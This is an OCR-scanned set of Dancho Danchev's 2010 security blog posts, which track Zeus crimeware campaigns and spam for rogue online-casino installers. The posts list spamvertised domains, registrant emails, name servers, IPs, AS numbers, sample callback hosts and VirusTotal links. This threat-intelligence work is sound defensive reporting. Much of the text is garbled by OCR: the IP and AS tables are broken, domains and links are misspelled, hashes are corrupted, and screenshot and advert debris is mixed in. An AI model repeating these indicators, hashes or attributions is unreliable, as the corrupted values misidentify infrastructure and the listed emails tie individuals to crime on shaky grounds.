repek.ne.kr - Email: limhomeslm@yahoo.co.uk 
repek.orkr - Email: limhomeslm@yahoo.co.uk 
repey.co.kr - Email: Olb55768@yahoo.co.uk 
repey.kr - Email: Olb55768@yahoo.co.uk 
repey.ne.kr - Email: Olb55768@yahoo.co.uk 
repey.onkr - Email: Olb55768@yahoo.co.uk 
repia.co.kr - Email: Olo55768@yahoo.co.uk 
repia.kr - Email: Olb55768@yahoo.co.uk 
repia.ne.kr - Email: Olo55768@yahoo.co.uk 
repia.onkr - Email: Olb55768@yahoo.co.uk 
repik.co.kr - Email: limhomeslm@yahoo.co.uk 
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114.186.201.106 ——MEL_—ge 114.160.0.011 ——“2——_> s4713 


116.80.31.193 ———NEL—-g 116.80.0.014 ———Ab——->_ 452510 
A 
186.80,220.82 ———NEL_gy 1296.80.216.021 ——“S——_m> s10620 


189.46.245.95 ———WHl gs 199.46.0.016 ——“i—_—-> 4527699 
190.90.225.63 ——_ Hil_», 190.90.224.0/22 ———A3_.gp AS10299 


4 199.193.6138 ——“i_» is9r920.013 as 


: AS13999 
201.165.19119¢ ———MEL_gy 201 165.176.0/20 
{ , 190,95.10.72 ———MElL_-g 190.95.10.024 ——AS-—_—> 514117 
) 201.241.61.114 ———MEL-gy 201.241.48.0720 ——Ab—-p_ a5:22047 
i 

] 4 

. 41.251.64.122, ———MEL > 41.251.64.020 ——“2——_ s6713 
= 

2 74.213.213.149 ———MEL gs 774.213.113.024 ——Ah—$> 511992 

2 77.254.186.206 ——MEL_» 77.254.0.016 ———“S——> 12741 


‘ 79.113.171.214 ——Mi ge 79 1120.013 


AS 
a - AS8708 


86.122521899 ———NEL_-g® 96 .120.0.0113 
is 

80.218.19.91 ———“El__-g> 90,218.0.015 ———“i—_——_» ass4o4 
is 
nd nsl.skcpanel.com 


64.20.42.235 ——MEL_g 64.20.32.019 ——“S-p asigzis 
we ns holdinglory.com 


= ns2.holdinglory.com ——H—-j-216.21.25.41 ——HHELge 216.21.24.021 ——AEeg 4531851 
ns2.skepanelcom ——4“A— > 92.125.152120 ——M&L-ge 92125.128.017 ——“S-g assiaao 


me.uk 


repik.kr - Email: limhomeslm@yahoo.co.uk 
repik.onkr - Email: limhomeslm@yahoo.co.uk 
repok.co.kr - Email: limhomeslm@yahoo.co.uk 
repok.kr - Email: limhomeslm@yahoo.co.uk 
repok.ne.kr - Email: limhomeslm@yahoo.co.uk 
repok.or.kr - Email: limhomeslm@yahoo.co.uk 
repoy.co.kr - Email: Olob55768@yahoo.co.uk 
repoy.kr - Email: Olb55768@yahoo.co.uk 
repoy.ne.kr - Email: Olb55768@yahoo.co.uk 
repoy.or.kr - Email: Olb55768@yahoo.co.uk 
repolil.co.uk 

repolil.me.uk 

repoli2.co.uk 

repoli2.me.uk 
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repoli3.co.uk 
repolie.co.uk 
repolio.co.uk 
repoliq.co.uk 
repoliq.me.uk 
repolit.me.uk 
repoliw.co.uk 
repoliw.me.uk 
repolix.co.uk 
repolix.me.uk 


Name servers of notice: 

ns1 .skcrealestate.net - 89.238.165.195 - Email: support@skrealty.net 
ns1 .addressway.net - 89.238.165.195 - Email: poolbill@hotmail.com 
nsl .skcpanel.com - 64.20.42.235 - Email: support@sk.com 

ns1 .holdinglory.com - 64.20.42.235 - Email: greysy@gmx.com 

nsl1 .skcres.com - 64.20.42.235 - Email: hr@skc.net 

nsl .x-videocovers.net - 64.20.42.235 - Email: storylink@live.com 


Interestingly, researchers from [29]M86 Security gained access to the web malware ex- 
ploitation kit used in a previous campaign: 


"It has been up and running and serving exploits for nearly a day. In this time almost 
40,000 unique users have been exposed to these exploits, and the Zeus file has 
been downloaded over 5000 times. These downloads do not include the PhotoArchive.exe 
file downloads that a user may be tricked into downloading and executing themselves." 


Updated will be posted as soon as new developments emerge. 


Related coverage of the gang’s previous campaigns: 

[30]Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild 
[31]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild 
[32]Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Exploits 
[33]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 

[34]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 

[35]Pushdo Injecting Bogus Swine Flu Vaccine 

[36]"Your mailbox has been deactivated" Spam Campaign Serving Crimeware 

[37]Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[38]The Multitasking Fast-Flux Botnet that Wants to Bank With You 


This post has been reproduced from [39]Dancho Danchev’s blog. Follow him [40]on Twitter. 


1._ftep: //ww. vizustotal.con/analisis/96562157 65S1600170902eSt530060edcb0b16850a180b60diaf510877e1-1267 
2. bttp://www.virustotal.com/analisis/2ab5e1c53bfd6dc914c7962da535z 6e137c7£417d6187d8b01b917088536Ld44- 12670 
3. http://www.virustotal .com/analisis/f72cf75417e21eecf8defata52a9601 c4eb4dbf d3961e782bd1c0aa0157ce8F c- 12670 
4. http://www. virustotal.com/analisis/84ea1092d66c937771da9801505eb1b7£926e416d34d7f8a43d457£ 2e4c33ada- 12670 
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2. http: //www.virustotal.com/analisis/7556ad16c7507777c21a73ebcc5d5f £3661f5e44a98899f 117aa96bc3246f 1fd-12664 
2534 


13. http://ddanchev. blogspot .com/2010/02/photoarchive-crimewareclient-side.htm 


14. ://irs/PhotoArchive/20Themed/,20Zeus/Client-SideZ20Exploits/20Serving/20Campaign/20in/,20the/,20Wild 
15. ://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE- 2007-5659 

16. -mitre.org/cgi-bin/cvename.cgi?name=2008- 2992 

17. .mitre.org/cgi-bin/cvename.cgi?name=2008-001 

18. ://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE- 2009-092 

19. -mitre.org/cgi-bin/cvename.cgi?name=CVE- 2009-4324 


20. http://www. virustotal.com/analisis/3d393354d40f c2a64cb68f e9fa51c575dabiaf87065abbef 811dd4d7e051db07-12662 
5738 

21. http: //www.virustotal.com/analisis/3aaa85a66689a9c09243127b0831e7294b3db191ce0c3e81ebc87 1fe843506fc- 12662 
22. http://ddanchev. blogspot .com/2010/01/pushdo-serving-crimeware-client-side.htm 


23. 
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31. http://ddanchev. blogspot .com/2010/02/photoarchive-crimewareclient-side.htm 
32. http://ddanchev. blogspot .com/2010/01/facebookaol-update-tool-spam- campaign. htm 


33. http://ddanchev. blogspot . com/2010/01/pushdo-serving-crimeware-client-side.htm 


34. http://ddanchev. blogspot .com/2010/01/outlook-web-access-themed-spam-campaign.htm 


35. http://ddanchev. blogspot . com/2009/12/pushdo-injecting-bogus-swine-flu.htm 


26. 
37. http://ddanchev. blogspot . com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.htm 
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6.2.16 Don’t Play Poker on an Infected Table - Part Two (2010-02-25 13:17) 


BE ee ere Gb nme OD tronics 


elfeworldcasino 
A 
I- DOWNLOAD - Casino Softw 


2- REGISTER - # Pree Acount 
; 
3- CLAIM - your Bonus 
Coupon Code: 350FUN 


«SS 


oat 


@éoLD, 


en ( 


= See Cae thas 


OG: 


Over the past week and a half, cybercriminals have been aggressively spamvertising a growing 
portfolio of domains, relying on deceptive advertising for nonexistent and fraudulent online 
gambling web sites, serving the well known Win32.GAMECasino. 


¢ Go through related posts: [1]Don’t Play Poker on an Infected Table; [2]Malware(Client-Side 
Exploits) Serving Online Casinos 


What’s particularly interesting about the campaign, is the fact that all of the domains serve 
identical template, with the SmartDownload.exe binary hosted "in the cloud" thanks to 
Amazon's Web Services (anat.s3.amazonaws.com/dir4/ SmartDownload.exe). 


Detecting rate for SmartDownload.exe - [3]Win32.GAMECasino - Result: 10/42 (23.81 
%). Sample phones back the following domain - download.realtimegaming.com 
/cdn/goldvipclub/package _list.ini.zip?fakeParam=1 - 212.201.100.144 - Email: ad- 
min@REALTIMEGAMING.COM; RealTime Gaming Holding Company, LLC, registered under 
the following address according to the information published on their web site: 
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¢ For Licensing opportunities or Company Information, please submit request to Hasting B.V. 
Click Here.Hastings International B.V.New Haven Office CenterEmancipatie Boulevard 31 
- P.O. Box 6052Curacao Netherlands Antilles 


Here are the spavertised domains in question, including the name servers involved. 


*.casinoeuroopen.net 
* lamssecure.net 
backstorypalmlaws.cn 
bostplanetothercn 
casinoeuroopen.net 
flashzap.net 


lamssecure.net 


AS 
nsl.casinoeuroopen.net a 4 " 1161230016 ——————f AS9318 
nslJamssecure.net - ? ? 


ns2.casinoeuroopen.net 
ns2.lamssecure.net 

ns3.casinoeuroopen.net 
ns3.lamssecure_net 

ns4.casinoeuroopen.net 
ns4.lamssecure.net 


Wwww.casinoeuroopen.net 


Spamvertised domains parked on 116.123.221.17; 112.159.237.58: 
aerojackpot.net - Email: dfgdfgvcsx12@foxmail.com 
compujackpot.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotadvance.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotalist.net - Email: dfgdfgvcsx12@foxmail.com 
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jackpotbee.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotbuzz.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotcanyon.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotclubs.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotfairy.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotfan.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotflag.net - Email: dfgdfgvcsx12@foxmail.com 
jackpoticity.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotjets.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotlodge.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotlodge.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotmoment.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotpair.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotrocket.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotthink.net - Email: dfgdfgvcsx12@foxmail.com 
jackpottodoor.net - Email: dfgdfgvcsx12@foxmail.com 
jackpotwire.net - Email: dfgdfgvcsx12@foxmail.com 
jacpotcongress.net - Email: dfgdfgvcsx12@foxmail.com 
linejackpot.net - Email: dfgdfgvcsx12@foxmail.com 
lux777cazino.net - Email: efghfgbvghfgh@qq.com 
majicjackpot.net - Email: dfgdfgvcsx12@foxmail.com 
midjackpot.net - Email: dfgdfgvcsx12@foxmail.com 
mixerjackpot.net - Email: dfgdfgvcsx12@foxmail.com 
needjackpot.net - Email: dfgdfgvcsx12@foxmail.com 
nestjackpot.net - Email: dfgdfgvcsx12@foxmail.com 
shopjackpot.net - Email: dfgdfgvcsx12@foxmail.com 
smart-nest.net - Email: dfgdsfvcb@163.com 
structjackpot.net - Email: dfgdfgvcsx12@foxmail.com 
the-cash.net - Email: dfgdsfvcb@163.com 
thejackpots.net - Email: dfgdfgvcsx12@foxmail.com 
windowjackpots.net - Email: dfgdfgvcsx12@foxmail.com 
win-vox.net - Email: dfgdsfvcb@163.com 


aerowin.net - Email: dfgdsfvcb@163.com 
beach-jackpot.net - Email: dfgdsfvcb@163.com 
beautyselite.net - Email: dfgdsfvcb@163.com 
binwin.net - Email: dfgdsfvcb@163.com 
clashflash.net - Email: dfgdsfvcb@163.com 
couldwin.net - Email: dfgdsfvcb@163.com 
dinwin.net - Email: dfgdsfvcb@163.com 
eliteclasss.net - Email: dfgdsfvcb@163.com 
eliteorder.net - Email: dfgdsfvcb@163.com 
eliteplaza.net - Email: dfgdsfvcb@163.com 
elitescoop.net - Email: dfgdsfvcb@163.com 
eliteweird.net - Email: dfgdsfvcb@163.com 
ezelite.net - Email: dfgdsfvcb@163.com 
flashapex.net - Email: dfgdsfvcb@163.com 
flashbrook.net - Email: dfgdsfvcb@163.com 
flashbuzzs.net - Email: dfgdsfvcb@163.com 
flashcensus.net - Email: dfgdsfvcb@163.com 
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flashclashs.net - Email: dfgdsfvcb@163.com 
flashlasch.net - Email: dfgdsfvcb@163.com 
flashlash.net - Email: dfgdsfvcb@163.com 
flashmoment.net - Email: dfgdsfvcb@163.com 
flashnest.net - Email: dfgdsfvcb@163.com 
flashpixie.net - Email: dfgdsfvcb@163.com 
flashslash.net - Email: dfgdsfvcb@163.com 
flashspark.net - Email: dfgdsfvcb@163.com 
flashspell.net - Email: dfgdsfvcb@163.com 
flashzap.net - Email: dfgdsfvcb@163.com 
free-smart.net - Email: dfgdsfvcb@163.com 
ginwin.net - Email: dfgdsfvcb@163.com 


* gamingeurocasino.net 


backstorypalmlaws.cn 


gamingeurocasino.net 


nsl.gamingeurocasino.net 
112.152.0.0/13 —AL_y» AS17858 


112.159.237.58 


ns2.gamingeurocasino.net 
ns3.gamingeurocasino.net 
ns4.gamingeurocasino.net 
www.backstorypalmlaws.cn 


www.gamingeurocasino.net 


goingtowins.net - Email: dfgdsfvcb@163.com 
hitecwinner.net - Email: dfgdsfvcb@163.com 
innerwinner.net - Email: dfgdsfvcb@163.com 
interelite.net - Email: dfgdsfvcb@163.com 
jackpot-direct.net - Email: dfgdsfvcb@163.com 
jackpot-fire.net - Email: dfgdsfvcb@163.com 
jackpot-help.net - Email: dfgdsfvcb@163.com 
jackpot-infinity.net - Email: dfgdsfvcb@163.com 
jackpot-mind.net - Email: dfgdsfvcb@163.com 
jackpot-minute.net - Email: dfgdsfvcb@163.com 
jackpot-phone.net - Email: dfgdsfvcb@163.com 
jackpot-reunion.net - Email: dfgdsfvcb@163.com 
jackpot-senate.net - Email: dfgdsfvcb@163.com 
jackpot-talk.net - Email: dfgdsfvcb@163.com 
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jackpot-taven.net - Email: dfgdsfvcb@163.com 
jackpot-topia.net - Email: dfgdsfvcb@163.com 
jackpot-wire.net - Email: dfgdsfvcb@163.com 
laschflash.net - Email: dfgdsfvcb@163.com 
learn-jackpot.net - Email: dfgdsfvcb@163.com 
magicwinner.net - Email: dfgdsfvcb@163.com 
mapwinner.net - Email: dfgdsfvcb@163.com 
mediaselite.net - Email: dfgdsfvcb@163.com 
mindelite.net - Email: dfgdsfvcb@163.com 
mrelite.net - Email: dfgdsfvcb@163.com 
needwin.net - Email: dfgdsfvcb@163.com 
pixiewinner.net - Email: dfgdsfvcb@163.com 
powerwinners.net - Email: dfgdsfvcb@163.com 


Get an amazing Match Bonus of 


300% 


Coupon Code: 350FUN 


predict-jackpot.net - Email: dfgdsfvcb@163.com 
pushelite.net - Email: dfgdsfvcb@163.com 
reseachelite.net - Email: dfgdsfvcb@163.com 
sellelite.net - Email: dfgdsfvcb@163.com 
sgameelite.net - Email: dfgdsfvcb@163.com 
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To get this bonus use cowpen code: S5OFUN 
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sharpwinner.net - Email: dfgdsfvcb@163.com 
smart-enough.net - Email: dfgdsfvcb@163.com 
smart-fire.net - Email: dfgdsfvcb@163.com 
smart-log.net - Email: dfgdsfvcb@163.com 
smart-nest.net - Email: dfgdsfvcb@163.com 
smart-spree.net - Email: dfgdsfvcb@163.com 
steelites.net - Email: dfgdsfvcb@163.com 
surveylite.net - Email: dfgdsfvcb@163.com 
targetelite.net - Email: dfgdsfvcb@163.com 
theelites.net - Email: dfgdsfvcb@163.com 
theflashers.net - Email: dfgdsfvcb@163.com 
theywin.net - Email: dfgdsfvcb@163.com 
velowinner.net - Email: dfgdsfvcb@163.com 
vote-smart.net - Email: dfgdsfvcb@163.com 
wanttowin.net - Email: dfgdsfvcb@163.com 
winbot.net - Email: dfgdsfvcb@163.com 
winnercrest.net - Email: dfgdsfvcb@163.com 
winnerfast.net - Email: dfgdsfvcb@163.com 
winnerhut.net - Email: dfgdsfvcb@163.com 
winnerincumbent.net - Email: dfgdsfvcb@163.com 
winnermass.net - Email: dfgdsfvcb@163.com 
winnerpub.net - Email: dfgdsfvcb@163.com 
winnerrocket.net - Email: dfgdsfvcb@163.com 
winnersalon.net - Email: dfgdsfvcb@163.com 
winnerscan.net - Email: dfgdsfvcb@163.com 
winnertake.net - Email: dfgdsfvcb@163.com 
winnertal.net - Email: dfgdsfvcb@163.com 
winnertoyou.net - Email: dfgdsfvcb@163.com 
zap-smart.net - Email: dfgdsfvcb@163.com 


Name servers of notice: 

nsl.bb6ns.com - 58.83.8.45 - Email: li-zhenshu@163.com 
nsl.bedws.com - 218.61.126.28 - Email: guoxiufenghy@163.com 
nsl.catdogns.com - 218.61.126.28 - Email: li-zhenshu@163.com 
nsl.cebht.com - 218.61.126.28 - Email: li-zhenshu@163.com 
nsl.dd5ns.com - 61.191.191.61 - Email: li-zhenshu@163.com 
ns1.dogmens.com - 208.78.242.185 - Email: hmr@data99.com 
nsl1.euromarketorder.com - 218.61.126.28 

nsl.fesws.com - 218.61.126.28 - Email: info2@data99.com 
nsl.goatdns.com - 218.61.126.28 - Email: li-zhenshu@163.com 
nsl.hh7ns.com - 218.61.126.28 - Email: li-zhenshu@163.com 
ns1.kindball.com - 218.61.126.28 - Email: zhaokaijunlp@163.com 
nsl.mm8ns.com - 218.61.126.28 - Email: li-zhenshu@163.com 
nsl.nn4ns.com - 218.61.126.28 - Email: li-zhenshu@163.com 
nsl.ss6ns.com - 61.191.191.61 - Email: shirley9127@hotmail.com 
nsl.wildnn.com - 208.78.242.185 - Email: hmr@data99.com 
ns2.gg9ns.com - 218.61.126.28 - Email: li-zhenshu@163.com 
ns2.sruisorehoes.com - 218.61.126.28 - Email: li-zhenshu@163.com 
ns2.zz8ns.com - 218.61.126.28 - Email: li-zhenshu@163.com 
ns3.bavns.com - 218.61.126.28 - Email: shirley9127@hotmail.com 
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ns3,.bawns.com - 218.61.126.28 - Email: li-zhenshu@163.com 
ns3.becns.com - 218.61.126.28 - Email: li-zhenshu@163.com 
ns3.bojns.com - 218.61.126.28 - Email: li-zhenshu@163.com 


The campaign is a great example of cybercrime-friendly affiliate networks, with the cy- 
bercriminals in this case investing a modest amount of money for the actual spamming 
process, and then earning 30 % flat rate, which can also be scaling between 20 % to 45 % 
depending on their choice. 


Affiliate — 


aS ——S ———S 


Potential Players Affiliate’s Website Casino Compensation 


The practice has been around for years. Here are three monetizations strategies seeing within 
the last two years, all of which remain an active tactic for fraudsters to take advantage of: 


¢ Brandjacking and monetizing through pseudo-value added crapware applications- this 
practice has been profiled in a previous analysis "[4]Cybersquatting Security Vendors for 
Fraudulent Purposes". PandaSecurity’s reaction back then? Immediate notification of their 
legal department. 


¢ SMS micro-payment scams through typosquatting and brandjacking - this tactic has al- 
ready been profiled in "[5]Legitimate Software Typosquatted in SMS Micro-Payment Scam" 
analysis. Compared to the typosquatting in the previous scheme, this campaign was mon- 
etizing freely available software. 


¢ Abuse of legitimate affiliate networks - In January, 2009, | [6]profiled and took down a 
campaign that has typosquatted domains for popular applications and was advertising 
them through Google’s AdSense in an attempt to earn money from a legitimate affiliate 
network - [7]Conduit’s Rewards Program. The abuse of these networks can be easily taken 
care of, since the cybercriminal that’s violating their Terms of Service is exposing himself 
as a legitimate user, with his very own CampaignID. 


You may want to reconsider using an online gambling application that’s being spammed using 
a botnet, with the actual application crypted using a tool exclusively used by malware authors 
in an attempt to bypass signatures based antivirus scanning. 


Amazon’s Web Services are aware of this campaign. Action against it should be taken 
shortly. 


This post has been reproduced from [8]Dancho Danchev’s blog. Follow him [9]on Twit- 
ter. 
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1. http://ddanchev. blogspot .com/2007/09/dont-play-poker-on-infected-table.htm 
2. http: //ddanchev. blogspot .com/2007/11/malware-serving-online-casinos.htm 
3. http://www.virustotal.com/analisis/2488c1252a5b3207d7af b9b6e14ebb38f f3abcd44aba0de1055db88b2b2416b8- 12670 
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. http://ddanchev. blogspot . com/2008/03/cybersquatting-security-vendors-for.htm 


4 
5. 

6 
7 

8 

9 


. http://www. conduit.com/ 
. http: //ddanchev.blogspot.com/ 
. http: //twitter.com/danchodanche 


6.2.17 Fotolog’s FTLog Malware Campaign Serves Bogus Video Codecs 
(2010-02-26 00:02) 


6.3 March 


6.3.1 Summarizing Zero Day’s Posts for February (2010-03-02 21:20) 


ZPNet 


Home News & Blogs Videos White Papers Downloads 


Ryan Naraine and Dancho Danchev 
omte GR eas OB tratAies 


Pick a blog Category 2 | ew | 


ZDNet Must Read 
Skeletons in Adobe's security closet Find the program 
ete Rall: We all known what happens when a software vendor dowrelays that fits vour career. 


the severity of a securty vulmerabaty. It always comes Back to haut 
them. ontinued » 


The 
Sis 


Popular Sanity 
Search Local Courses Saver Videos 


March ist, 2010 


— Saree Pe 


Googler ships exploit to defeat ib fesenrasaa 

ASLR+DEP ——? 
Elve stems that 
you aren't cut owt 

Cotegestoss scpmrar: Code tremens Bonsess, Date thet fusion code flan te be a CIO 


Tooe Techmawe. Reaseccher, Memory. kxalet Date Leecweon Prevents 


al) 33 TakBaks “SS B&B BB & OP +4 Sponsored Links 
Vulnerability Scanner 
A prorrenent security researcher has released an explog fy How wuinerable are your networks? Find 


that uses a mew techeeque to defeat ALSR + DEP on out with the SAINT Scanner Leadershio vs, 


Microsoft's Windows operating system. . y . : management; 

is on CA Web Security Mgmt Understand the 
Windows Vista Secherhertsmanagement von Unter- 

The explog, released by Google securtty researcher r r 2 differences 

: - nehmens-Webanwendungen verbessern 

‘SkyUned,” uses the ret-into-thc techreque to bypass DEP (Data Exeation 

Prevertion) and launch code execubon attacks on «86 platforms 

Read the rest of thes entry » 


Recent Entries Five ways to lead 
your team to peak 
performance 


Bi 


The five most 


Luewathon 


March ist, 2010 
Zero-days flaws surface in Apple 
Safari 


3169 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for February, 2010. 
You [2]can also go through [3]previous summaries, as well as subscribe to my [4]personal RSS 
feed, [5]Zero Day’s main feed, [6]follow me or all of [7]ZDNet’s blogs on Twitter. 


Recommended reading - [8]Reports: SQL injection attacks and malware led to most 
data breaches; [9]Report: Malicious PDF files comprised 80 percent of all exploits for 2009 
and [10]10 things you didn’t know about the Koobface gang 


01. [11]Does Blippy really pose a security risk? 

02. [12]Reports: SQL injection attacks and malware led to most data breaches 
03. [13]Scammers phishing for sensitive iPhone data 

04. [14]Report: Malicious PDF files comprised 80 percent of all exploits for 2009 
05. [15]The Kneber botnet - FAQ 

06. [16]10 things you didn’t know about the Koobface gang 


This post has been reproduced from [17]Dancho Danchev’s blog. Follow him [18]on Twitter. 


. http: //blogs.zdnet .com/securit 


. http: //ddanchev. blogspot .com/2010/01/summarizing-zero-days-posts-for.html 


ttp://ddanchev. blogspot .com/2010/02/summarizing-zero-days-posts-for- january. html 


1 
2 
3 
4. http://updates.zdnet .com/tags/danchot+danchev.html?t=0és=0&0=1&émode=rss 
5. http: //feeds. feedburner . com/zdnet/security 
6. http: //twitter .com/danchodanchev 
7. http: //twitter. com/zdnetblogs 
8 
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6.3.2 Don’t Play Poker on an Infected Table - Part Three (2010-03-09 22:43) 


£750 FREE 


1 HOUR FREE PLAY 


eS VOSOVTe re FTrosv" 


United Kingdeen ©-200-S87-1474 Rest of the World) +44-800-587-1474 (Charges may apply) 


7) = = Sco a ee 2 Oe eo 


The monetization of phony online gambling networks - clearly tolerating systematic violation 
of their TOS - is continuing with the scammers behind last month’s campaign ([1]Don’t Play 
Poker on an Infected Table - Part Two) spamvertising another portfolio of domains using new 
templates. 


It’s worth pointing out that the spammers don’t just earn revenue every time someone 
installs the application, but also, every time the, now converted visitor, interacts financially 
with the service, a monetization approach you'll see in the attached screenshots. 


Detection rates for the spamvertised binaries (downloaded from gamez-lux.com and 
we3tt.com) : [2]StarsVIPCasino Setup.exe - Result: 14/42 (33.33 %); [3]GoldenMum- 
myEN.exe - Result: 9/42 (21.43 %); [4]RubyRoyaleEN.exe - Result: 11/42 (26.19 %). Sample 
phone back locations: download.thepalacegroupgaming.com; pcm3.valueactive.eu; rubyfor- 
tune.mgsmup.com 
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1000. = 


FIRST DEPOSIT BONUS 


SLOTS BLACK ROULETTE VIDEO Arrniel 


MACHINE JACK WEELS POKER 


mam 8 
@ 131 0 onan — om @thewte Bs 


= paysole UetMoney@ @CickondBuy wirecard GP & 


Spamvertised domains include: 
adrembovesttes.net - Email: pengjiajie222@163.com 
bonuscasinoslux.net - Email: fgsdvobbvd@qq.com 
bonusgameslux.net - Email: fgsdvbbvd@qq.com 
bonusluxcasinos.net - Email: fgsdvbbvd@qq.com 
bonusluxplays.net - Email: fgsdvbbvd@qq.com 
bonusplayslux.net - Email: fgsdvbbvd@qq.com 
casinosbonuslux.net - Email: fgsdvbbvd@qq.com 
casinosluxclub.net - Email: fgsdvbbvd@qq.com 
casinosluxstar.net - Email: fgsdvobbvd@qq.com 
clopelinesutes.net - Email: fgsdvbbvd@qq.com 
clubgameslux.net - Email: fgsdvbbvd@qq.com 
clubluxgames.net - Email: fgsdvobbvd@qq.com 
club-of-lux.net - Email: fgsdvbbvd@qq.com 
clubs-play.net - Email: fgsdvbbvd@qq.com 
clubvegas-games.net - Email: fgsdvbbvd@qq.com 
gameclubviva.net - Email: fgsdvbbvd@qq.com 
game-lux-club.net - Email: fgsdvbbvd@qq.com 
gamesbonuslux.net - Email: fgsdvobbvd@qq.com 
games-gold.net - Email: fgsdvbbvd@qq.com 
gameslux.net - Email: fgsdvobbvd@qq.com 


Sire 


gamesstarlux.net - Email: fgsdvbbvd@qq.com 
gamevivagold.net - Email: fgsdvbbvd@qq.com 
gorxshop.net - Email: sdfxckj@msn.com 
hannoweramtes.net - Email: ftyughsere@qq.com 
lutiok.net - Email: ftgy23fge@126.com 
luxbonusgames.net - Email: fgsdvbbvd@qq.com 
luxbonusplays.net - Email: fgsdvbbvd@qq.com 
luxcasinosbonus.net - Email: fgsdvbbvd@qq.com 
luxclubcasinos.net - Email: fgsdvbbvd@qq.com 


sae TTS ae 


“a 


WELCOME BONUS 


> DOWNLOAD NOW 


%& Dewnlo 


° 0 69 o 6 oR ware whebe 
browsing ou ste 
24/7 SUPPORT K | Cance i 
aT 
eechone: «1-647-923-4098 “wy ~ NU 
a= - Biv tt 
= 7-923-469% - = - ne poke 
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luxclubplays.net - Email: fgsdvbbvd@qq.com 
luxgamesbonus.net - Email: fgsdvbbvd@qq.com 
luxgamesstar.net - Email: fgsdvbbvd@qq.com 
luxplaysclub.net - Email: fgsdvbbvd@qq.com 
luxplaysstar.net - Email: fgsdvbbvd@qq.com 
luxs-games.net - Email: fgsdvbbvd@qq.com 
luxstarplays.net - Email: fgsdvobbvd@qq.com 
mollehoukutes.net - Email: guoaiwense@163.com 
murgadobarotes.net - Email: guoaiwense@163.com 
namedosaras.net - Email: ftyughsere@qq.com 
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pay3500win.net - Email: dfgdvbcv@sina.com 
playeuro777.net - Email: fghvvbocfgds@tom.com 
playeuro888.net - Email: fghvvbcfgds@tom.com 
playglobal777.net - Email: dfhhjg4ee@163.com 
playsclublux.net - Email: fgsdvbbvd@qq.com 
playsluxclub.net - Email: fgsdvbbvd@qq.com 
realcash-mine.net - Email: dfgdvocv@sina.com 
realcash-offer.net - Email: dfgdvbcv@sina.com 
realcash-wins.net - Email: dfgdvocv@sina.com 
regal-jackpot.net - Email: dfgdvobcv@sina.com 
regalvegas-online.net - Email: dfgdvobcv@sina.com 
royalcasino777.net - Email: edwfrsdf@126.com 
royalcasino888.net - Email: edwfrsdf@126.com 
royalvegas-play.net - Email: dfgdvocv@sina.com 
satregonovates.net - Email: pengjiajie222@163.com 
softaserutes.net - Email: ftyughsere@qq.com 
softoutnertes.net - Email: ftyughnsere@qq.com 
softuoplowtes.net - Email: ftyughsere@qq.com 
stargameslux.net - Email: ftyughsere@qq.com 
starluxcasinos.net - Email: ftyughsere@qq.com 
sundowutortes.net - Email: guoaiwense@163.com 
vegasclubsgame.net - Email: fgsdvbbvd@qq.com 
vegasgamesclub.net - Email: fgsdvbbvd@qq.com 


Sample monetization in action: 


AVAILABLE LANDING PAGES 


Hi Freddy 


FURLUNG 


fi ' 
$100 FREE sain 
sigoup boaus 
The new 


section. 


ere S 


Pais UACE vo 


Thanks for all the feedback we’ve had fromm you about the new site 
and we’re very pleased to hear that you're enjoying the new look and 


site isn't all the developers have been busy 
with though as Spin Palace has just launched the Italian version of 
their software. Spin Palace has had Italian flash software for 
sometime now and we’re confident that the new Italian download 
version is going ta help your conversions for thase of you with Italian 
traffic. New Italian banners are available in the Marketing Tools 


August has been a strong month especially for the time of year and | 


For the Latest Marketing Tools 
Click Here 


» i b. rAVNLE ys r es E 
Statistics Sumamary - You are currently in the 25% cormmission tier 


& summary of your account statistics for the current month are shown below. For more detailed statistics click here. 


gue 
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Update schedule: 
Visits & Downloads: Live! 


Account Data: Every 30 minutes. (su ry St ts) 3 Stat . 
Revenue and Earnings: Every 2 hours. cans : C itn 2 ~) C sc inooscs Report ) 


Report Month: | July rs ( susmir Your commission tier is 30% 


Spin Palace Casino 7380 176 30 18 1 11 47 $14,651 $4,395 

(t Ruby Fortune Casino 23 2 0 0 0 0 4 $729 $219 

Spin Palace Poker 25 4 te) i Ls] 2 4 $16 $5 
Total 828 182 30 19 1 13 35 $15,395 $4,619 


Update schedule: 
Visits & Downloads: Live! 


Account Data: Every 30 minutes. <€ on t =) me a r 
Revenue and Earnings: Every 2 hours, —EEe C sick inci ) C mictio Report) 


Report Month: ‘July ha v| ¢ SUDIEE 3 Your commission tier is 30% 


# Spin Palace 780 176 30 is 1 11 47 $14,651 $4,395 
Blackja 1 0 0 0 QO Oo i $o to 
Roulette 362 91 is 12 1 7 39 $12,857 $3,857 
3 Reel Slots 156 27 3 0 0 0 i) $0 $0 
Video Poker 47 3 0 2 0 0 1 $o $0 
Baccarat 103 16 7 4 fT) 4 7 $1,794 $538 
Keno 38 33 2 0 0 0 Q $0 $0 
Craps 1 0 ny) a O 0 0 $0 $0 


- aa 


Phony affiliate networks are reserve the right to forward the responsibility for the malicious 
activity to participants violating their Terms or Service. A violation that earned both parties 
significant amounts of money, in between 


The "don’t play poker on an infected table" series are prone to expand. 


Related posts: 

[5]Don’t Play Poker on an Infected Table - Part Two 
